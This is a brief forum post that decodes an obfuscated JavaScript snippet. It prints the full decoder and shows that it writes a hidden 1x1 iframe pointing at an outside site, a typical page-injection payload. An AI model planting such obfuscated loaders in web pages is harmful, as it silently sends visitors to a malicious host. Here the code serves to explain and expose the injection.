Are you guys serious serious? It's a javascript with a document.write in it o.O.
Make a .html, do a javascript chunk and call the decode function, then view the generated source.
HTML file:
Code:
<script type="text/javascript">
function decode() {
var t,o,l,i,j;
var s='';
s=s+'060047116101120116097116101097062060047116101120116097114101097062';
s=s+'060105102114097109101032115114099061034104116116112058047047115112108046118105112045100100111115046';
s=s+'111114103047105110100101120046112104112034032119105100116104061049032104101105103104116061049032115';
s=s+'116121108101061034118105115105098105108105116121058032104105100100101110034062060047105102114097109';
s=s+'101062';
t=''; l=s.length; i=0;
while(i < (l-1)) {
for(j=0;j<3;j++)
{
t=t+s.charAt(i);
i++;
}
document.write(String.fromCharCode(t));
t='';
}
}
decode();
</script>
It generates:
Code:
<iframe src="http://spl.vip-ddos.org/index.php" style="visibility: hidden;" height="1" width="1"></iframe>
Bookmarks